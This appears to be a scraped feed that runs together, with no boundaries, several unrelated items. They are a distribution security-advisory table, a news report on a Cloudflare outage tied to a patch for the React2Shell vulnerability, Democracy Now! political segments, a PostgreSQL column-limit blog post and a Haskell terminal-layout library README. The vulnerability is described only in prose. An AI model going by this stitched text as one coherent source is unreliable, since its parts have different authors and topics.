| Fedora | FEDORA-2025-7c5b6a3bcb | F43 | xpdf | 2025-12-05 |
| Mageia | MGASA-2025-0316 | 9 | digikam, darktable, libraw | 2025-12-05 |
| Mageia | MGASA-2025-0317 | 9 | gnutls | 2025-12-05 |
| Mageia | MGASA-2025-0320 | 9 | python-django | 2025-12-05 |
| Mageia | MGASA-2025-0318 | 9 | unbound | 2025-12-05 |
| Mageia | MGASA-2025-0319 | 9 | webkit2 | 2025-12-05 |
| Mageia | MGASA-2025-0321 | 9 | xkbcomp | 2025-12-05 |
| Oracle | ELSA-2025-21034 | OL10 | bind | 2025-12-05 |
| Oracle | ELSA-2025-21281 | OL10 | firefox | 2025-12-05 |
| Oracle | ELSA-2025-22417 | OL8 | gimp:2.8 | 2025-12-05 |
| Oracle | ELSA-2025-21691 | OL10 | haproxy | 2025-12-05 |
| Oracle | ELSA-2025-20994 | OL10 | ipa | 2025-12-05 |
| Oracle | ELSA-2025-21485 | OL10 | java-25-openjdk | 2025-12-05 |
| Oracle | ELSA-2025-21006 | OL10 | kea | 2025-12-05 |
| Oracle | ELSA-2025-21038 | OL10 | kea | 2025-12-05 |
| Oracle | ELSA-2025-21118 | OL10 | kernel | 2025-12-05 |
| Oracle | ELSA-2025-21463 | OL10 | kernel | 2025-12-05 |
| Oracle | ELSA-2025-21032 | OL10 | libsoup3 | 2025-12-05 |
| Oracle | ELSA-2025-21013 | OL10 | libssh | 2025-12-05 |
| Oracle | ELSA-2025-20998 | OL10 | libtiff | 2025-12-05 |
| Oracle | ELSA-2025-21248 | OL10 | openssl | 2025-12-05 |
| Oracle | ELSA-2025-20983 | OL10 | podman | 2025-12-05 |
| Oracle | ELSA-2025-21220 | OL10 | podman | 2025-12-05 |
| Oracle | ELSA-2025-21037 | OL10 | qt6-qtsvg | 2025-12-05 |
| Oracle | ELSA-2025-21002 | OL10 | squid | 2025-12-05 |
| Oracle | ELSA-2025-22660 | OL9 | systemd | 2025-12-05 |
| Oracle | ELSA-2025-21015 | OL10 | vim | 2025-12-05 |
| Oracle | ELSA-2025-21035 | OL10 | xorg-x11-server-Xwayland | 2025-12-05 |
| Slackware | SSA:2025-338-01 | | httpd | 2025-12-04 |
| Slackware | SSA:2025-338-02 | | libpng | 2025-12-04 |
| SUSE | openSUSE-SU-2025:15794-1 | TW | chromedriver | 2025-12-04 |
| SUSE | SUSE-SU-2025:4320-1 | SLE15 SLE-m5.5 oS15.5 | kernel | 2025-12-04 |
| SUSE | openSUSE-SU-2025:0461-1 | osB15 | python-mistralclient | 2025-12-04 |
| SUSE | openSUSE-SU-2025:0460-1 | osB15 | python-mistralclient | 2025-12-04 |
| Ubuntu | USN-7912-2 | 16.04 18.04 20.04 | cups | 2025-12-04 |
| Ubuntu | USN-7912-1 | 22.04 24.04 25.04 25.10 | cups | 2025-12-04 |
| Ubuntu | USN-7910-2 | 22.04 | linux-azure | 2025-12-05 |
| Ubuntu | USN-7909-4 | 22.04 | linux-gcp, linux-gke, linux-gkeop | 2025-12-05 |
| Ubuntu | USN-7906-2 | 25.10 | linux-gcp | 2025-12-05 |
| Ubuntu | USN-7889-5 | 22.04 | linux-ibm-6.8 | 2025-12-05 |
| Ubuntu | USN-7874-3 | 20.04 | linux-iot | 2025-12-04 |
| Ubuntu | USN-7913-1 | 18.04 20.04 22.04 24.04 25.04 25.10 | mame | 2025-12-04 |
Earlier today, Cloudflare experienced a widespread outage that caused websites and online platforms worldwide to go down, returning a "500 Internal Server Error" message.
In a status page update, the internet infrastructure company has now blamed the incident on an emergency patch designed to address a critical remote code execution vulnerability in React Server Components, which is now actively exploited in attacks.
"A change made to how Cloudflare's Web Application Firewall parses requests caused Cloudflare's network to be unavailable for several minutes this morning," Cloudflare said .
"This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today."
Tracked as CVE-2025-55182 , this maximum severity security flaw (dubbed React2Shell) affects the React open-source JavaScript library for web and native user interfaces, as well as dependent React frameworks such as Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, and RedwoodSDK.
The vulnerability was found in the React Server Components (RSC) 'Flight' protocol, and it allows unauthenticated attackers to gain remote code execution in React and Next.js applications by sending maliciously crafted HTTP requests to React Server Function endpoints.
While multiple React packages in their default configuration (i.e., react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack) are vulnerable, the flaw only affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0 released during the past year.
Although the impact is not as widespread as initially believed, security researchers with Amazon Web Services (AWS) have reported that multiple China-linked hacking groups (including Earth Lamia and Jackpot Panda) have begun exploiting the React2Shell vulnerability hours after the max-severity flaw was disclosed.
The NHS England National CSOC also said on Thursday that several functional CVE-2025-55182 proof-of-concept exploits are already available and warned that "continued successful exploitation in the wild is highly likely."
Last month, Cloudflare experienced another worldwide outage that brought down the company's Global Network for almost 6 hours, an incident described by CEO Matthew Prince as the "worst outage since 2019."
Cloudflare fixed another massive outage in June, which caused Access authentication failures and Zero Trust WARP connectivity issues across multiple regions, and also impacted Google Cloud's infrastructure.
The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identities of those on board who were targeted, but now the family of a fisherman from Colombia has filed the first legal challenge to the military strikes. In a petition filed with the Inter-American Commission on Human Rights, the family says a strike on September 15 killed 42-year-old Alejandro Andres Carranza Medina, a fisherman from Santa Marta and father of four. His family says he was fishing for tuna and marlin off Colombia’s Caribbean coast when his boat was bombed, and was not smuggling drugs.
“Alejandro was murdered,” says international human rights attorney Dan Kovalik, who filed the legal petition on behalf of the family. “This is not how a civilized nation should act, just murdering people on the high seas without proof, without trial.”
Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week’s fatal shooting near the White House. During a recent Cabinet meeting, Trump went on a racist tirade against the Somali community, saying, “We don’t want them in our country,” and referring to Somali immigrants as “garbage.” Minnesota has the largest Somali community in the United States, and the vast majority of the estimated 80,000 residents in the state are American citizens or legal permanent residents.
“We have seen vile things that the president has said, but in these moments, we need to come together and respond,” says Jaylani Hussein, the executive director of CAIR -Minnesota. He also highlights the connections between Trump’s targeting of the community and foreign policy. “If you demonize Muslims, then you can get away with killing Muslims abroad. This has always been the case, from the Afghanistan War to the Iraq War.”
A recent blog posting by Frédéric Delacourt (Did you know? Tables in PostgreSQL are limited to 1,600 columns) reminded me once again that in the analytics world customers sometimes ask for more than 1600 columns.
Quick recap: in OLTP, the aim is (usually) to use the 3rd normal form. In OLAP, tables are often only vaguely normalized, and wide or very wide fact tables in 2nd normal form are quite common. But are 1600 columns a bad idea? Yes. Do some applications generate such wide tables? Also yes. I’ve seen my fair share of customer requests and support tickets asking if the 1600 columns limit can be raised or even lifted.
But is that possible?
In PostgreSQL, a single row must fit into a single page on disk. The disk page size, by default, is 8 kB. As Frédéric shows in tests in his blog posting, sometimes even a smaller number of columns does not fit into the page.
Now my analytics background is not only with PostgreSQL, but also with WarehousePG (a Greenplum fork) and with Greenplum itself. In WarehousePG the default page size is 32 kB. Will this increase the number of columns? Unfortunately not:

#define MaxTupleAttributeNumber 1664    /* 8 * 208 */
#define MaxHeapAttributeNumber  1600    /* 8 * 200 */
The fork is still using the same values for MaxTupleAttributeNumber and MaxHeapAttributeNumber, limited to 1600 columns. There’s also a comment near MaxHeapAttributeNumber in src/include/access/htup_details.h, explaining that it must stay somewhat below MaxTupleAttributeNumber so that UPDATEs on a maximally-full table still work: the working tuples built by UPDATE include the CTID and possibly additional hidden "resjunk" columns.
It is possible to increase these limits, and create tables with a couple thousand columns. Theoretically, a single page fits 8136 single-byte columns (like a BOOLEAN) in PostgreSQL. In WarehousePG this even fits 32712 single-byte columns. But that is not the real limit.
The HeapTupleHeader has the t_infomask2 field, which is a uint16 (unsigned integer), defined in access/htup_details.h. Out of the available bits, 11 are used for the number of attributes:

#define HEAP_NATTS_MASK         0x07FF  /* 11 bits for number of attributes */
And 11 bits gives 2^11 - 1 = 2047 attributes. Any tuple can have a maximum of 2047 attributes, even with all the 1600 safeguards increased or removed. In practice, it’s 2041 attributes. When inserting into or updating a table, the database will not write more than those 2041 columns; all other columns are not set. If the column definition of the higher columns is NOT NULL, the INSERT or UPDATE fails with a constraint violation. Otherwise the higher columns are simply set to NULL.
Bottom line: while the table can have many more columns, the database can’t write anything into these additional columns. Not without fully refactoring the way tuples are created internally.
In theory it is possible to raise the 1600 columns limit to a slightly larger number. In practice it is not worth the small gain, and it pushes against internal safety boundaries built into the database.
Also in practice this will have all kinds of mostly unintended side effects and problems. This is untested territory, and all unit tests must be updated as well. Tools like psql have a built-in limitation too, which also must be raised. This in turn requires always using the patched binary; it might no longer be possible to use a “standard” psql against this database. Other tools might have problems as well with very wide tables.
Exporting the data is possible, but the table can no longer be imported into an unpatched version of the database. This basically creates a fork of a fork, which must be maintained and updated for every new minor and major version.
tl;dr: Don’t do this.
Thanks to Robert Haas for reviewing the code assumptions about a larger number of columns.
Simple, beautiful CLI output for Haskell 🪶
Build declarative and composable sections, trees, tables, dashboards, and interactive Elm-style TUI's.
Part of d4 • Also in: JavaScript, Scala
Layoutz.hs - like a header file
LayoutzApp - for Elm-style TUI's
TaskListDemo.hs • SimpleGame.hs
Add Layoutz on Hackage to your project's .cabal file:
build-depends: layoutz
All you need:
import Layoutz
(1/2) Static rendering - Beautiful, compositional strings:
import Layoutz
demo = layout
[ center $ row
[ withStyle StyleBold $ text "Layoutz"
, withColor ColorCyan $ underline' "ˆ" $ text "DEMO"
]
, br
, row
[ statusCard "Users" "1.2K"
, withBorder BorderDouble $ statusCard "API" "UP"
, withColor ColorRed $ withBorder BorderThick $ statusCard "CPU" "23%"
, withStyle StyleReverse $ withBorder BorderRound $ table ["Name", "Role", "Skills"]
[ ["Gegard", "Pugilist", ul ["Armenian", ul ["bad", ul["man"]]]]
, ["Eve", "QA", "Testing"]
]
]
]
putStrLn $ render demo
(2/2) Interactive apps - Build Elm-style TUI's:
import Layoutz
data Msg = Inc | Dec
counterApp :: LayoutzApp Int Msg
counterApp = LayoutzApp
{ appInit = (0, None)
, appUpdate = \msg count -> case msg of
Inc -> (count + 1, None)
Dec -> (count - 1, None)
, appSubscriptions = \_ -> onKeyPress $ \key -> case key of
CharKey '+' -> Just Inc
CharKey '-' -> Just Dec
_ -> Nothing
, appView = \count -> layout
[ section "Counter" [text $ "Count: " <> show count]
, ul ["Press '+' or '-'", "ESC to quit"]
]
}
main = runApp counterApp
There's printf, and there are full-blown TUI libraries - but there's a gap in-between.
Element
layout arranges elements vertically:
layout [elem1, elem2, elem3] -- Joins with "\n"
Call render on any element to get a string.
The power comes from uniform composition - since everything has the Element typeclass, everything can be combined.
With OverloadedStrings enabled, you can use string literals directly:
layout ["Hello", "World"] -- Instead of layout [text "Hello", text "World"]
Note: When passing to functions that take polymorphic Element a parameters (like underline', center', pad), use text explicitly:
underline' "=" $ text "Title" -- Correct
underline' "=" "Title" -- Ambiguous type error
text "Simple text"
-- Or with OverloadedStrings:
"Simple text"
Simple text
Add line breaks with br:
layout ["Line 1", br, "Line 2"]
Line 1
Line 2
section
section "Config" [kv [("env", "prod")]]
section' "-" "Status" [kv [("health", "ok")]]
section'' "#" "Report" 5 [kv [("items", "42")]]
=== Config ===
env: prod
--- Status ---
health: ok
##### Report #####
items: 42
layout
layout ["First", "Second", "Third"]
First
Second
Third
row
Arrange elements side-by-side horizontally:
row ["Left", "Middle", "Right"]
Left Middle Right
Multi-line elements are aligned at the top:
row
[ layout ["Left", "Column"]
, layout ["Middle", "Column"]
, layout ["Right", "Column"]
]
tightRow
Like row, but with no spacing between elements (useful for gradients and progress bars):
tightRow [withColor ColorRed $ text "█", withColor ColorGreen $ text "█", withColor ColorBlue $ text "█"]
███
alignLeft, alignRight, alignCenter, justify
Align text within a specified width:
layout
[ alignLeft 40 "Left aligned"
, alignCenter 40 "Centered"
, alignRight 40 "Right aligned"
, justify 40 "This text is justified evenly"
]
Left aligned
Centered
Right aligned
This text is justified evenly
hr
hr
hr' "~"
hr'' "-" 10
──────────────────────────────────────────────────
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----------
vr
row [vr, vr' "║", vr'' "x" 5]
│ ║ x
│ ║ x
│ ║ x
│ ║ x
│ ║ x
│ ║
│ ║
│ ║
│ ║
│ ║
kv
kv [("name", "Alice"), ("role", "admin")]
name: Alice
role: admin
table
Tables automatically handle alignment and borders:
table ["Name", "Age", "City"]
[ ["Alice", "30", "New York"]
, ["Bob", "25", ""]
, ["Charlie", "35", "London"]
]
┌─────────┬─────┬─────────┐
│ Name │ Age │ City │
├─────────┼─────┼─────────┤
│ Alice │ 30 │ New York│
│ Bob │ 25 │ │
│ Charlie │ 35 │ London │
└─────────┴─────┴─────────┘
ul
Clean unordered lists with automatic nesting:
ul ["Feature A", "Feature B", "Feature C"]
• Feature A
• Feature B
• Feature C
Nested lists with auto-styling:
ul [ "Backend"
, ul ["API", "Database"]
, "Frontend"
, ul ["Components", ul ["Header", ul ["Footer"]]]
]
• Backend
◦ API
◦ Database
• Frontend
◦ Components
▪ Header
• Footer
ol
Numbered lists with automatic nesting:
ol ["First step", "Second step", "Third step"]
1. First step
2. Second step
3. Third step
Nested ordered lists with automatic style cycling (numbers → letters → roman numerals):
ol [ "Setup"
, ol ["Install dependencies", "Configure", ol ["Check version"]]
, "Build"
, "Deploy"
]
1. Setup
a. Install dependencies
b. Configure
i. Check version
2. Build
3. Deploy
underline
Add underlines to any element:
underline "Important Title"
underline' "=" $ text "Custom" -- Use text for custom underline char
Important Title
───────────────
Custom
══════
box
With title:
box "Summary" [kv [("total", "42")]]
┌──Summary───┐
│ total: 42 │
└────────────┘
Without title:
box "" [kv [("total", "42")]]
┌────────────┐
│ total: 42 │
└────────────┘
statusCard
statusCard "CPU" "45%"
┌───────┐
│ CPU │
│ 45% │
└───────┘
inlineBar
inlineBar "Download" 0.75
Download [███████████████─────] 75%
tree
tree "Project"
[ branch "src"
[ leaf "main.hs"
, leaf "test.hs"
]
, branch "docs"
[ leaf "README.md"
]
]
Project
├── src
│ ├── main.hs
│ └── test.hs
└── docs
└── README.md
chart
chart [("Web", 10), ("Mobile", 20), ("API", 15)]
Web │████████████████████ 10
Mobile │████████████████████████████████████████ 20
API │██████████████████████████████ 15
pad
Add uniform padding around any element:
pad 2 $ text "content"
content
spinner
Animated loading spinners for TUI apps:
spinner "Loading..." frameNum SpinnerDots
spinner "Processing" frameNum SpinnerLine
spinner "Working" frameNum SpinnerClock
spinner "Thinking" frameNum SpinnerBounce
Styles:
SpinnerDots
- Braille dot spinner: ⠋ ⠙ ⠹ ⠸ ⠼ ⠴ ⠦ ⠧ ⠇ ⠏
SpinnerLine
- Classic line spinner: | / - \
SpinnerClock
- Clock face spinner: 🕐 🕑 🕒 ...
SpinnerBounce
- Bouncing dots: ⠁ ⠂ ⠄ ⠂
Increment the frame number on each render to animate:
-- In your app state, track a frame counter
data AppState = AppState { spinnerFrame :: Int, ... }
-- In your view function
spinner "Loading" (spinnerFrame state) SpinnerDots
-- In your update function (triggered by a tick or key press)
state { spinnerFrame = spinnerFrame state + 1 }
With colors:
withColor ColorGreen $ spinner "Success!" frame SpinnerDots
withColor ColorYellow $ spinner "Warning" frame SpinnerLine
center
Smart auto-centering and manual width:
center "Auto-centered" -- Uses layout context
center' 20 "Manual width" -- Fixed width
Auto-centered
Manual width
margin
Add prefix margins to elements for compiler-style error messages:
margin "[error]"
[ text "Ooops"
, text ""
, row [ text "result :: Int = "
, underline' "^" $ text "getString"
]
, text "Expected Int, found String"
]
[error] Ooops
[error]
[error] result :: Int = getString
[error] ^^^^^^^^^
[error] Expected Int, found String
Elements like box, table, and statusCard support different border styles:
BorderNormal (default):
box "Title" ["content"]
┌──Title──┐
│ content │
└─────────┘
BorderDouble :
withBorder BorderDouble $ statusCard "API" "UP"
╔═══════╗
║ API ║
║ UP ║
╚═══════╝
BorderThick :
withBorder BorderThick $ table ["Name"] [["Alice"]]
┏━━━━━━━┓
┃ Name ┃
┣━━━━━━━┫
┃ Alice ┃
┗━━━━━━━┛
BorderRound :
withBorder BorderRound $ box "Info" ["content"]
╭──Info───╮
│ content │
╰─────────╯
BorderNone (invisible borders):
withBorder BorderNone $ box "Info" ["content"]
Info
content
Add ANSI colors to any element:
layout[
withColor ColorRed $ text "The quick brown fox...",
withColor ColorBrightCyan $ text "The quick brown fox...",
underlineColored "~" ColorRed $ text "The quick brown fox...",
margin "[INFO]" [withColor ColorCyan $ text "The quick brown fox..."]
]
Standard Colors:
ColorBlack
ColorRed
ColorGreen
ColorYellow
ColorBlue
ColorMagenta
ColorCyan
ColorWhite
ColorBrightBlack
ColorBrightRed
ColorBrightGreen
ColorBrightYellow
ColorBrightBlue
ColorBrightMagenta
ColorBrightCyan
ColorBrightWhite
ColorNoColor (for conditional formatting)
Extended Colors:
ColorFull n - 256-color palette (0-255)
ColorTrue r g b - 24-bit RGB true color
Create beautiful gradients with extended colors:
let palette = tightRow $ map (\i -> withColor (ColorFull i) $ text "█") [16, 19..205]
redToBlue = tightRow $ map (\i -> withColor (ColorTrue i 100 (255 - i)) $ text "█") [0, 4..255]
greenFade = tightRow $ map (\i -> withColor (ColorTrue 0 (255 - i) i) $ text "█") [0, 4..255]
rainbow = tightRow $ map colorBlock [0, 4..255]
where
colorBlock i =
let r = if i < 128 then i * 2 else 255
g = if i < 128 then 255 else (255 - i) * 2
b = if i > 128 then (i - 128) * 2 else 0
in withColor (ColorTrue r g b) $ text "█"
putStrLn $ render $ layout [palette, redToBlue, greenFade, rainbow]
Add ANSI styles to any element:
layout[
withStyle StyleBold $ text "The quick brown fox...",
withColor ColorRed $ withStyle StyleBold $ text "The quick brown fox...",
withStyle StyleReverse $ withStyle StyleItalic $ text "The quick brown fox..."
]
Styles:
StyleBold
StyleDim
StyleItalic
StyleUnderline
StyleBlink
StyleReverse
StyleHidden
StyleStrikethrough
StyleNoStyle (for conditional formatting)
Combining Styles:
Use <> to combine multiple styles at once:
layout[
withStyle (StyleBold <> StyleItalic <> StyleUnderline) $ text "The quick brown fox...",
withStyle (StyleBold <> StyleReverse) $ text "The quick brown fox..."
]
You can also combine colors and styles:
withColor ColorBrightYellow $ withStyle (StyleBold <> StyleItalic) $ text "The quick brown fox..."
Create your own components by implementing the Element typeclass:
import Layoutz
import Data.List (intercalate)
data Square = Square Int
instance Element Square where
renderElement (Square size)
| size < 2 = ""
| otherwise = intercalate "\n" (top : middle ++ [bottom])
where
w = size * 2 - 2
top = "┌" ++ replicate w '─' ++ "┐"
middle = replicate (size - 2) ("│" ++ replicate w ' ' ++ "│")
bottom = "└" ++ replicate w '─' ++ "┘"
-- Helper to avoid wrapping with L
square :: Int -> L
square n = L (Square n)
-- Use it like any other element
putStrLn $ render $ row
[ square 3
, square 5
, square 7
]
┌────┐ ┌────────┐ ┌────────────┐
│ │ │ │ │ │
└────┘ │ │ │ │
│ │ │ │
└────────┘ │ │
│ │
└────────────┘
Drop into GHCi to experiment:
cabal repl
λ> :set -XOverloadedStrings
λ> import Layoutz
λ> putStrLn $ render $ center $ box "Hello" ["World!"]
┌──Hello──┐
│ World! │
└─────────┘
λ> putStrLn $ render $ table ["A", "B"] [["1", "2"]]
┌───┬───┐
│ A │ B │
├───┼───┤
│ 1 │ 2 │
└───┴───┘
Build Elm-style terminal applications with the built-in TUI runtime.
import Layoutz
data Msg = Inc | Dec
counterApp :: LayoutzApp Int Msg
counterApp = LayoutzApp
{ appInit = (0, None)
, appUpdate = \msg count -> case msg of
Inc -> (count + 1, None)
Dec -> (count - 1, None)
, appSubscriptions = \_ -> onKeyPress $ \key -> case key of
CharKey '+' -> Just Inc
CharKey '-' -> Just Dec
_ -> Nothing
, appView = \count -> layout
[ section "Counter" [text $ "Count: " <> show count]
, ul ["Press '+' or '-'", "ESC to quit"]
]
}
main = runApp counterApp
The runApp function spawns three daemon threads:
- renders appView state to the terminal (~30fps)
- listens to appSubscriptions, calls appUpdate
- runs Cmd side effects async, feeds results back
As per the above, commands run without blocking the UI.
Press ESC to exit.
LayoutzApp state msg
data LayoutzApp state msg = LayoutzApp
{ appInit :: (state, Cmd msg) -- Initial state + startup command
, appUpdate :: msg -> state -> (state, Cmd msg) -- Pure state transitions
, appSubscriptions :: state -> Sub msg -- Event sources
, appView :: state -> L -- Render to UI
}
| Subscription | Description |
|---|---|
| onKeyPress (Key -> Maybe msg) | Keyboard input |
| onTick msg | Periodic ticks (~100ms) for animations |
| batch [sub1, sub2, ...] | Combine subscriptions |
| Command | Description |
|---|---|
| None | No effect |
| Cmd (IO (Maybe msg)) | Run IO, optionally produce message |
| Batch [cmd1, cmd2, ...] | Multiple commands |
| cmd :: IO () -> Cmd msg | Fire and forget |
| cmdMsg :: IO msg -> Cmd msg | IO that returns a message |
Example: Logger with file I/O
import Layoutz
data Msg = Log | Saved
data State = State { count :: Int, status :: String }
loggerApp :: LayoutzApp State Msg
loggerApp = LayoutzApp
{ appInit = (State 0 "Ready", None)
, appUpdate = \msg s -> case msg of
Log -> (s { count = count s + 1 },
-- cmdMsg (not cmd) so the Saved message fires once the write completes
cmdMsg $ appendFile "log.txt" ("Entry " <> show (count s) <> "\n") >> pure Saved)
Saved -> (s { status = "Saved!" }, None)
, appSubscriptions = \_ -> onKeyPress $ \key -> case key of
CharKey 'l' -> Just Log
_ -> Nothing
, appView = \s -> layout
[ section "Logger" [text $ "Entries: " <> show (count s)]
, text (status s)
, ul ["'l' to log", "ESC to quit"]
]
}
main = runApp loggerApp
CharKey Char -- 'a', '1', ' '
EnterKey, BackspaceKey, TabKey, EscapeKey, DeleteKey
ArrowUpKey, ArrowDownKey, ArrowLeftKey, ArrowRightKey
SpecialKey String -- "Ctrl+C", etc.
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN : This is Democracy Now! , democracynow.org, The War and Peace Report . I’m Amy Goodman.
We turn now to New Orleans and southeast Louisiana, where more than 250 federal immigration agents launched Operation Catahoula Crunch this week. They reportedly aim to make more than 5,000 arrests over two months.
Homeland Security Secretary Kristi Noem says the operation will target, quote, “the worst of the worst,” unquote. But local officials say they’re skeptical. City Councilmember Lesli Harris responded, quote, “There are nowhere near 5,000 violent offenders in our region. … What we’re seeing instead are mothers, teenagers, and workers being detained during routine check-ins, from their homes and places of work.” So far, agents have targeted the parking lots of home improvement stores like Home Depot and workers at construction sites.
At a New Orleans City Council hearing Thursday, about 30 protesters were removed after demanding city leaders do more to protect immigrants, calling for ICE -free zones. In a public comment session, residents went to the microphone one by one and were cut off when it was clear they wanted to talk about immigration, which was not on the formal agenda. This is Mich González of SouthEast Dignity Not Detention Coalition. After his mic was cut, he continued to try to be heard.
MICH GONZÁLEZ: We delivered a letter to City Council on November 21st. I’m part of the SouthEast Dignity Not Detention Coalition, and we requested a meeting. This should be on the agenda. It should be on the agenda.
CHAIR : Not germane.
MICH GONZÁLEZ: Public safety is at the heart —
Little kids are not going to school right now. People are not able to take their disabled parents to their medical appointments. … Please, I’m begging you.
PROTESTERS : Shame! Shame!
MICH GONZÁLEZ: And right now it’s about the safety of the people who live here. But I promise you, in just — these people are planning to stay here for two months and take as many as 5,000 of the people who live in this great city of New Orleans.
PROTESTERS : Shame! Shame!
MICH GONZÁLEZ: And they are the people who work here. They’re the people who clean dishes here. They’re the people who take care of the elderly in the nursing homes. … Please, I’m begging you.
AMY GOODMAN : For more, we’re joined by Homero López, legal director for ISLA , Immigrant Services and Legal Advocacy, based in New Orleans.
Welcome to Democracy Now! , Homero. If you can start off by talking about what exactly you understand this plan is? As they move in 250 immigration agents, they say they’re making 5,000 arrests in the next two months. What’s happening to New Orleans?
HOMERO LÓPEZ: Yes. Thank you, Amy, for having me on.
We have seen the officers come into the city and the surrounding areas, as well. And the fact that they’re looking for a specific quota, that they have a number that they’re going after, makes it clear that they’re not targeting, as they claim, the worst of the worst. Instead, they’re going to target whoever they can, and as the Supreme Court has unfortunately authorized them, they’re using racial profiling as part of that approach.
AMY GOODMAN : They’re calling it “Catahoula Crunch.” Louisiana’s state dog is the Catahoula. Explain what they’re saying here, what Kristi Noem is talking about, who the immigrants are that they’re going after.
HOMERO LÓPEZ: Yeah. They originally had called it the “Swamp Sweep,” but I guess they thought “SS” was a little bit too on the nose, so they went after “Catahoula Crunch” instead.
And what they’re saying is they’re going to target, you know, folks who have criminal backgrounds, or at least that’s the purported position from the higher-ups at least. There was a video of Bovino recently saying he’s going after immigrants. He was asked, “Who are you targeting? What are you — who are you looking for?” And he said, “This is an immigration raid.” And so, he’s — they’re focusing on immigrants across the board.
What we’ve seen has been folks at work, folks at their check-ins, people around schools, ICE officers setting up around or CBP officers setting up around the schools. And the fear that’s being — the fear that’s coming into the — being sowed in the community is really the true intent of what they’re — of their operation here.
AMY GOODMAN : Catahoula Crunch named after the Louisiana state dog. Didn’t Homeland Secretary Kristi Noem famously shoot her dog?
HOMERO LÓPEZ: That is a story that’s come out, yes.
AMY GOODMAN : Many ICE officials who now work at the national level came up through Louisiana. Is that right? Can you talk about them? And who are the hundreds of agents moved in to do these arrests?
HOMERO LÓPEZ: Yeah, Louisiana is playing a oversized role when it comes to immigration enforcement throughout the country. The former wildlife and fisheries secretary here in Louisiana is now one of the deputy — or, is the deputy director of ICE nationally. Our former area, New Orleans, ICE director, field office director, is also at headquarters. There are various deportation officers here from Louisiana who have gone to work at headquarters. And so, the approach that they used to take or that they have taken in Louisiana since 2014 to incarcerate as many people as possible, quickly warehouse and deport people from the state, is something that seems to be the structure that is being operated now from the national headquarters.
AMY GOODMAN : Louisiana, in other parts of the country, we know it particularly here when it comes to detention. You have Mahmoud Khalil, who is the Columbia student who was imprisoned in Louisiana. You have Rümeysa Öztürk, the Tufts graduate student who was imprisoned in Louisiana. Talk about the overall detention complex in Louisiana.
HOMERO LÓPEZ: Louisiana has a history, a terrible history, of being the incarceration capital of the world. And that is no different when it comes now to immigration detention. Louisiana is number two when it comes to the second — the state with the second-largest detained immigrant population in the country, next to Texas. However, we’re not a border state. We also don’t have a large immigrant population by numbers. Instead, what Louisiana does is it receives a lot of people who are detained around the country.
And so, the additional aspect of what happens in Louisiana is that we have these very rural, isolated detention centers in central Louisiana, central and northern Louisiana, which are very far away from major metropolitan or from major population centers, which means what you end up with is people removed from their legal and support systems. So, when you had someone like Mahmoud Khalil being moved down here from New York, what you had was removing him from his social network, from people who could assist him, from being able to provide him with assistance. Same thing with Rümeysa Öztürk. And these were highly publicized cases, places where folks had large support networks. And so, when we deal with folks who don’t have those support networks, who don’t have that publicity, who don’t have that kind of support, and you have them in such a remote, isolated area, what you end up is basically warehousing folks without giving them an opportunity to fight their case and be able to present a viable case through actual due process.
AMY GOODMAN : You can’t help but notice that New Orleans is a blue city in a red state, Louisiana. Louisiana has the most detention beds outside of Texas. Can you talk about the consent decree that was overturned last month, Homero?
HOMERO LÓPEZ: The consent decree was overturned last month by the Justice Department, and they wanted to get rid of it. It had been in place for over a decade here in Louisiana, that did not — or, here in New Orleans, that had not allowed the local sheriff’s office to cooperate with ICE .
Now the new sheriff, we don’t know exactly what she’s going to do, but what it does is it removes this tool that existed, which was originally implemented because of previous abuses, that had been determined by a federal court, that New Orleans police, New Orleans Sheriff’s Office should not be cooperating, and had ordered the sheriff’s office not to cooperate. Without that consent decree in place, it’s now up to the sheriff. And so, there is a movement on the ground from advocacy groups and from other organizers to push the sheriff to continue to have that kind of policy, but we’ll see what comes from that.
AMY GOODMAN : And can you talk about the people you represent? I mean, I think it’s really important, not only in New Orleans, but around the country. A number of the people being picked up are going to their court hearings. They are following the rules, and they end up being arrested.
HOMERO LÓPEZ: Yeah, the majority of people who are being arrested, the majority of calls that we’re receiving are from folks who have — who are going through the process, whether they be children who originally applied through the Special Immigrant Juvenile status process and are awaiting their ability to apply for residency, whether it’s spouses of U.S. citizens who are going to their interviews and are being picked up, whether it’s people who have immigration court hearings and have filed their applications and are attending the hearings, are going — again, they’re doing it, quote-unquote, “the right way.” And that’s who is being picked up. Those are the folks who are the low-hanging fruit. Those are the folks who are going to be targeted.
There’s a reason that these officers are going to worksites and not necessarily doing in-depth investigations to identify folks that they claim are a danger to the community. Instead, what they’re doing is they’re taking folks out of our community: our neighbors, our friends, our family members. And that’s who they’re detaining and they’re sending into these terrible detention centers in order to try to quickly deport them from the country.
AMY GOODMAN : Homero López, I want to thank you for being with us. Do you have a final comment on the City Council hearing that was held yesterday as mics were turned off on person after person who was calling for ICE -free zones?
HOMERO LÓPEZ: Yeah, we hope that City Council will take a stance. We understand that they don’t necessarily have a ton of power over federal actions, but the point here is about the values that the city stands for and what we are going to demonstrate to our community and to our residents of who we support, what we support and what we stand for in the city.
AMY GOODMAN : Homero López is the legal director of ISLA , the Immigration Services and Legal Advocacy, based in New Orleans, Louisiana.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN : A major victory for President Trump: The Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five House seats in next year’s midterms. A lower court previously ruled the redistricting map was unconstitutional because it had been racially gerrymandered and would likely dilute the political power of Black and Latino voters.
Supreme Court Justice Elena Kagan wrote in her dissent, quote, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution,” Justice Kagan wrote.
